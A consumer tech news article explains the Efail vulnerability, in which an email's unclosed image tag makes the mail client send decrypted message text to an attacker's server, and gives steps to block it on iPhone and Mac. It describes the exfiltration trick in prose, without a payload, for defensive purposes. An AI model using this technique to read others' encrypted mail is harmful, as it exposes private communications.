How to protect your Mac, iPhone, iPad from Efail email exploit

By

EFAIL lets hackers read encrypted emails on your iPhone.
EFAIL lets hackers read encrypted emails on your iPhone.
Photo: Ed Hardy/Cult of Mac

Researchers in Europe have discovered a way to read the contents of encrypted emails sent with iOS and macOS devices. The so-called Efail exploit is significant enough that the Electronic Frontier Foundation calls it an “immediate risk.”

Apple is certainly working on a patches for all its devices, but there are ways to protect your laptop, phone and tablet now.

Efail technical details

The Efail attack requires deliberately mis-written HTML tags, according to the researchers who discovered it. In an Efail attack, a malicious email starts with an image tag whose source attribute isn’t closed. Within the attribute is the attacker’s web domain.

Next, the attacker’s email contains the encrypted text of the email. The attacker then ends the email by closing the image tag that was previously opened.

How Efail works
The attacking email is carefully crafted. Then the decrypted text is inserted into the image tag. Finally, the link that shows up in the attacker’s server logs.
Photo: EFAIL.de

When the victim’s email client opens this email, it will decrypt the text, but also treat everything between the opened and closed image attribute tags as the source of the image. That includes the decrypted contents of the email.

The mail client will request the image from the attacker’s web domain. This will send the decrypted text of the email to their server, where it can be read from server logs.

How to protect your iPhone from Efail

Protecting the contents of your emails from this attack is easy but inconvenient. It requires turning off the “Load Remote Images” email feature. This is because, as described above, the exploit uses the email client’s attempt to load a remote image to grab the encrypted text of the mail.

On an iPhone, making this change requires simply going to Settings > Mail and then unchecking Load Remote Images.

How to protect your Mac from Efail

The process on a Mac is more complicated, but not beyond the abilities of the average user.

First off, make sure the macOS Mail app is closed by going to the Mail drop-down box and selecting Quit Mail. Next, open the Finder by clicking its icon in the Dock. Then open the Go drop-down box by tapping Go at the top of the page, and select Go to Folder…

In the resulting text box, enter /Library/Mail/Bundles. This will open a folder containing GPGMail.mailbundle. Delete this file. This will stop the Mail app from decrypting emails.

Anyne needing more help should read the in-depth guide to fighting Efail provided by the Electronic Frontier Foundation.

Both of these workarounds involve some inconvenience. Still, the European researchers who discovered Efail recommend them for “people in hostile environments,” which includes journalists, political activists, whistleblowers, etc.

Hopefully, Apple will quickly release iOS and macOS updates to fix the security holes that Efail exploits.